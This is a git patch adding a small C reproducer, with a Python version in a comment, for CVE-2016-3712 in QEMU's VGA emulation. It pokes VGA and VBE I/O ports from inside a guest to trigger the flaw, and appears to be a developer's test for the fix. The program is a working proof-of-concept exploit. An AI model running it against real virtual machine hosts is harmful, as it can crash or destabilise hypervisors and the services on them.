From 49f82d81cc61e57764e4429beadfec51de02fa9c Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Tue, 7 Feb 2017 12:28:06 +0100
Subject: add cve-2016-3712

---
 .gitignore      |  1 +
 Makefile        | 14 ++++++++++++
 cve-2016-3712.c | 71 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 86 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 Makefile
 create mode 100644 cve-2016-3712.c

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..6ae7d26
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+cve-2016-3712
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..897a38e
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,14 @@
+
+CC	?= gcc
+CFLAGS	?= -Os -g
+CFLAGS	+= -Wall
+
+SOURCES	:= $(wildcard *.c)
+TARGETS	:= $(patsubst %.c,%,$(SOURCES))
+
+all: $(TARGETS)
+
+clean:
+	rm -f $(TARGETS)
+	rm -f *~
+
diff --git a/cve-2016-3712.c b/cve-2016-3712.c
new file mode 100644
index 0000000..d94c26c
--- /dev/null
+++ b/cve-2016-3712.c
@@ -0,0 +1,71 @@
+/*
+ * python version:
+ * -------------------------------------------------------------
+
+from periphery import MMIO
+import time
+mmio_base = 0xfebd4000
+mmio_range = 0x1000
+mmio = MMIO(mmio_base, mmio_range)
+mmio.write16(0x0504, 0x4000)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x040E, 0x85)
+mmio.write8(0x040F, 0xB4)
+mmio.write8(0x0404, 0x49)
+mmio.write8(0x0405, 0xFC)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x0507, 0x20)
+
+ * -------------------------------------------------------------
+ * below is the c version, not requiring the vga mmio bar,
+ * using io port access to vga and vbe ports instead.
+ *
+ * see docs/specs/standard-vga.txt in qemu repo for mmio bar spec.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/io.h>
+
+int main(int argc, char *argv[])
+{
+    if (ioperm(0x3c0, 0x20, 1) < 0) {
+        perror("ioperm vga");
+        exit(1);
+    }
+    if (ioperm(0x1ce, 0x04, 1) < 0) {
+        perror("ioperm vbe");
+        exit(1);
+    }
+
+    fprintf(stderr, "#1 ... \n");
+    // mmio.write16(0x0504, 0x4000)
+    outw(0x0002, 0x1ce);
+    outw(0x4000, 0x1d0);
+    sleep(1);
+
+    fprintf(stderr, "#2 ... \n");
+    // mmio.write8(0x040E, 0x85)
+    outb(0x85, 0x3ce);
+    // mmio.write8(0x040F, 0xB4)
+    outb(0xb4, 0x3cf);
+    // mmio.write8(0x0404, 0x49)
+    outb(0x49, 0x3c4);
+    // mmio.write8(0x0405, 0xFC)
+    outb(0xfc, 0x3c5);
+    sleep(1);
+
+    // mmio.write8(0x0507, 0x20)
+    fprintf(stderr, "#3 ... \n");
+    outw(0x0003, 0x1ce);
+    outw(0x0020, 0x1d0);
+    sleep(1);
+
+    fprintf(stderr, "done\n");
+    exit(0);
+}
-- 
cgit